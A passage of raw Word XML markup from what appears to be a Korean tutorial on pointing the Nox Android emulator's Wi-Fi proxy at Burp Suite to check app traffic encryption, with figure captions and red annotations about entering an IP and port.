                </wp:positionV>
                <wp:extent cx="601980" cy="220980"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="2667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272D" id="직사각형 26" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:58.5pt;margin-top:360.75pt;width:47.4pt;height:17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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00976691" w:rsidRPr="00176F06" w:rsidRDefault="0097669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176F06">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>프록시 설정 및 데이터 암호화 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D0229B" w:rsidRPr="00C223A0" w:rsidRDefault="006717D6" w:rsidP="00E357F9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b/>
        </w:rPr>
      </w:pP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8B7E68" wp14:editId="2B7D2DD4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>901065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3298190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="1270" b="0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E6F" w:rsidRPr="00DB6554" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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 w:rsidR="00667E98">
                              <w:t>5</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>연결된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와이파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B7E68" id="Text Box 91" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:70.95pt;margin-top:259.7pt;width:181.4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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00DB6554" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6"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 w:rsidR="00667E98">
                        <w:t>5</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>연결된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와이파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BBEE7C" wp14:editId="78B8E6D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3277235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3298190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="1270" b="0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E6F" w:rsidRPr="00CE370A" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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 w:rsidR="00667E98">
                              <w:t>6</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>와이파이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편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BEE7C" id="Text Box 92" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:258.05pt;margin-top:259.7pt;width:181.4pt;height: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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00CE370A" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6"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 w:rsidR="00667E98">
                        <w:t>6</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>와이파이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편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7C66C6" wp14:editId="077F9B44">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2358390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2508885</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2849880" cy="227330"/>
                <wp:effectExtent l="0" t="76200" r="0" b="2032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227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5" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:185.7pt;margin-top:197.55pt;width:224.4pt;height:17.9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" strokecolor="red" strokeweight="1.5pt">
                <v:stroke endarrow="open" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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74314E" wp14:editId="1594609E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5215890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2352675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="255270" cy="259080"/>
                <wp:effectExtent l="0" t="0" r="11430" b="2667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37272" id="직사각형 48" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:410.7pt;margin-top:185.25pt;width:20.1pt;height:20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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w: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4B5AB9" wp14:editId="7DE4566D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>948690</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2550795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1386840" cy="457200"/>
                <wp:effectExtent l="0" t="0" r="22860" b="1905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644E2" id="직사각형 42" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:74.7pt;margin-top:200.85pt;width:109.2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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251793408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BD4911A" wp14:editId="64CF75E0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>901065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2457450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2303780" cy="650240"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="16510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65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3A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251795456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05E9EDA4" wp14:editId="7A4E6931">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3277235</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2312670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2303780" cy="947420"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="2413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94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267AFB" wp14:editId="3848C487">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3277235</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1945005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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E6F" w:rsidRPr="000851CA" w:rsidRDefault="00610E6F" w:rsidP="00E64015">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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 w:rsidR="00667E98">
                              <w:t>4</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>네트워크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및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인터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67AFB" id="Text Box 90" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:258.05pt;margin-top:153.15pt;width:181.4pt;height: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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="000851CA" w:rsidRDefault="00610E6F" w:rsidP="00E64015">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6"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 w:rsidR="00667E98">
                        <w:t>4</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>네트워크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및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인터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57F9" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b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9E00358" wp14:editId="01ED38CA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3293110</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3678555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="2987675"/>
                <wp:effectExtent l="19050" t="19050" r="20320" b="22225"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="104" name="그룹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2987675"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2303780" cy="2987675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298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0" name="직사각형 70"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="44450" y="628650"/>
                            <a:ext cx="739140" cy="2057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직사각형 71"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="44450" y="1123950"/>
                            <a:ext cx="312420" cy="259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762000" y="571500"/>
                            <a:ext cx="9042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0E6F" w:rsidRPr="00D0229B" w:rsidRDefault="00610E6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D0229B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본</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D0229B">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                </w:rPr>
                                <w:t>인</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00D0229B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IP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입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04800" y="1104900"/>
                            <a:ext cx="14217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0E6F" w:rsidRPr="00E357F9" w:rsidRDefault="00610E6F" w:rsidP="00D0229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E357F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임</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00E357F9">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                </w:rPr>
                                <w:t>의의</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00E357F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포</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00E357F9">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                </w:rPr>
                                <w:t>트번호</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00E357F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입</w:t>
                              </w:r>
                              <w:r w:rsidRPr="00E357F9">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="FF0000"/>
                                </w:rPr>
                                <w:t>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1955800" y="2730500"/>
                            <a:ext cx="281940" cy="213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00358" id="그룹 104" o:spid="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:259.3pt;margin-top:289.65pt;width:181.4pt;height:235.25pt;z-index:251828224" coordsize="23037,29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0" o:spid="_x0000_s1031" type="#_x0000_t75" style="position:absolute;width:23037;height:29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" stroked="t" strokecolor="black [3213]">
                  <v:imagedata r:id="rId26" o:title=""/>
                  <v:path arrowok="t"/>
                  <o:lock v:ext="edit" aspectratio="f"/>
                </v:shape>
                <v:rect id="직사각형 70" o:spid="_x0000_s1032" style="position:absolute;left:444;top:6286;width:7391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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <v:rect id="직사각형 71" o:spid="_x0000_s1033" style="position:absolute;left:444;top:11239;width:3124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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <v:shape id="Text Box 72" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:7620;top:5715;width:9042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:rsidR="00610E6F" w:rsidRPr="00D0229B" w:rsidRDefault="00610E6F">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00D0229B">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t>본</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D0229B">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t>인</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00D0229B">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> IP</w:t>
                        </w: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입</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t>력</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 73" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:3048;top:11049;width:14217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:rsidR="00610E6F" w:rsidRPr="00E357F9" w:rsidRDefault="00610E6F" w:rsidP="00D0229B">
                        <w:pPr>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00E357F9">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t>임</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00E357F9">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t>의의</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00E357F9">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 포</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00E357F9">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t>트번호</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00E357F9">
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 입</w:t>
                        </w:r>
                        <w:r w:rsidRPr="00E357F9">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                          </w:rPr>
                          <w:t>력</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="직사각형 74" o:spid="_x0000_s1036" style="position:absolute;left:19558;top:27305;width:2819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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E357F9" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b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4A84D7E" wp14:editId="47B17F6A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>912767</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3678555</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="2988945"/>
                <wp:effectExtent l="19050" t="19050" r="20320" b="20955"/>
                <wp:wrapTopAndBottom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2988945"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2303780" cy="2988945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2988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" name="직사각형 59"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="76200" y="160020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CE7B7" id="그룹 103" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:71.85pt;margin-top:289.65pt;width:181.4pt;height:235.35pt;z-index:251821056" coordsize="23037,29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">
                <v:shape id="그림 49" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;width:23037;height:29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" stroked="t" strokecolor="black [3213]">
                  <v:imagedata r:id="rId28" o:title=""/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:rect id="직사각형 59" o:spid="_x0000_s1028" style="position:absolute;left:762;top:16002;width:2590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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
                <w10:wrap type="topAndBottom"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E357F9"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71EF85" wp14:editId="50FEB30F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6724650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="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E6F" w:rsidRPr="00F0115F" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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 w:rsidR="00667E98">
                              <w:t>7</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>프록시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수동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EF85" id="Text Box 101" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:71.85pt;margin-top:529.5pt;width:181.4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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00F0115F" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6"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 w:rsidR="00667E98">
                        <w:t>7</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>프록시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수동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설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57F9"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281619" wp14:editId="5AE49A24">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3289935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6723380</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="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E6F" w:rsidRPr="00AC35B8" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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 w:rsidR="00667E98">
                              <w:t>8</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>호스트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이름과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포트번호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1619" id="Text Box 102" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:259.05pt;margin-top:529.4pt;width:181.4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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00AC35B8" w:rsidRDefault="00610E6F" w:rsidP="00E357F9">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6"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 w:rsidR="00667E98">
                        <w:t>8</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>호스트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이름과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포트번호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변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31E5"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A8C669" wp14:editId="4CD065C9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1489710</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>833755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1835150" cy="6350"/>
                <wp:effectExtent l="0" t="76200" r="12700" b="10795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6029E" id="직선 화살표 연결선 37" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:117.3pt;margin-top:65.65pt;width:144.5pt;height:.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" strokecolor="red" strokeweight="1.5pt">
                <v:stroke endarrow="open" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B231E5"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DDC056" wp14:editId="632887CB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3337560</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>706755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1695450" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="19050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99CD" id="직사각형 36" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:262.8pt;margin-top:55.65pt;width:133.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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B231E5"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EE6DF5" wp14:editId="69FD2977">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1108710</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>643255</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="361950" cy="48260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8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0CC8D" id="직사각형 35" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:87.3pt;margin-top:50.65pt;width:28.5pt;height:3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" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E64015"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2CB5CA" wp14:editId="3E46CE04">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>901065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1946910</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2303780" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="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E6F" w:rsidRPr="00C808A3" w:rsidRDefault="00610E6F" w:rsidP="00E64015">
                            <w:pPr>
                              <w:pStyle w:val="aa"/>
                              <w:ind w:leftChars="0" w:left="0" w:firstLine="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[그림</w:t>
                            </w:r>
                            <w:r w:rsidR="006717D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67E98">
                              <w:t>13</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve">] 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Tool </w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>–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설</w:t>
                            </w:r>
                            <w:r w:rsidR="00344CC8">
                              <w:t>정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CB5CA" id="Text Box 89" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:70.95pt;margin-top:153.3pt;width:181.4pt;height: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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w:rsidR="00610E6F" w:rsidRPr="00C808A3" w:rsidRDefault="00610E6F" w:rsidP="00E64015">
                      <w:pPr>
                        <w:pStyle w:val="aa"/>
                        <w:ind w:leftChars="0" w:left="0" w:firstLine="0"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:szCs w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>[그림</w:t>
                      </w:r>
                      <w:r w:rsidR="006717D6">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00667E98">
                        <w:t>13</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve">] </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Tool </w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>–</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 설</w:t>
                      </w:r>
                      <w:r w:rsidR="00344CC8">
                        <w:t>정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31E5" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251787264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D5A3BCE" wp14:editId="49B52B32">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>901065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>373380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2304000" cy="1516865"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="2667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51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E5" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251785216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0850CB1A" wp14:editId="1E8C4D5C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3277235</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>592455</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2304000" cy="981648"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="28575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81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8B6" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>버프</w:t>
      </w:r>
      <w:r w:rsidR="00976691" w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>스위트의 프록시를 사용하기 위해 녹스 프록시 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E344BD" w:rsidRPr="00C223A0" w:rsidRDefault="00652F63" w:rsidP="00652F63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b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C223A0">
        <w:rPr>
          <w:rFonts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0" wp14:anchorId="07807CA5" wp14:editId="673A7E96">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3886381</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4679950" cy="1230630"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="26670"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="98" name="그룹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30630"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4679950" cy="1229995"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="77" name="그림 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1229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2" name="직사각형 82"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="86360" y="294640"/>
                            <a:ext cx="685800" cy="182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AAEE6" id="그룹 98" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:306pt;width:368.5pt;height:96.9pt;z-index:251846656;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-width-relative:margin;mso-height-relative:margin" coordsize="46799,1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" o:allowoverlap="f">
